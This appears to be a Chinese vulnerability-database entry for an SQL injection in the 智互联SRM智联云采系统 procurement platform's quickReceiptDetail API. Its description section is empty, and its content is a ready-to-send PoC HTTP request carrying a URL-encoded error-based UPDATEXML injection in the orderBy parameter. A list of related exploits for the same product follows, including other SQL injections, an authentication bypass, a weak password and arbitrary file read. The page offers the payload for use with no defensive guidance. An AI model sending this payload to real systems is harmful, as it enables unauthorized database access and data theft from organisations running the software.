智互联SRM智联云采系统 quickReceiptDetail SQL注入漏洞

漏洞描述

PoC代码

GET /adpweb/api/srm/delivery/quickReceiptDetail?orderBy=%28UPDATEXML%288058%2CCONCAT%280x2e%2C0x71707a7671%2C%28SELECT+%28ELT%288058%3D8058%2C1%29%29%29%2C0x71766a7671%29%2C3521%29%29 HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

相关漏洞推荐

• POC 智互联SRM智联云采系统 statusList SQL注入漏洞
• POC 智互联SRM智联云采系统 inquiry/getSuppliers SQL注入漏洞
• 智互联SRM智联云采系统 testService SQL注入漏洞
• POC 智互联SRM智联云采系统 receiptDetail SQL注入漏洞
• 智互联SRM智联云采系统 autologin 权限绕过漏洞
• 智互联SRM智联云采系统 druid 弱口令漏洞
• 智互联SRM智联云采系统 download 任意文件读取漏洞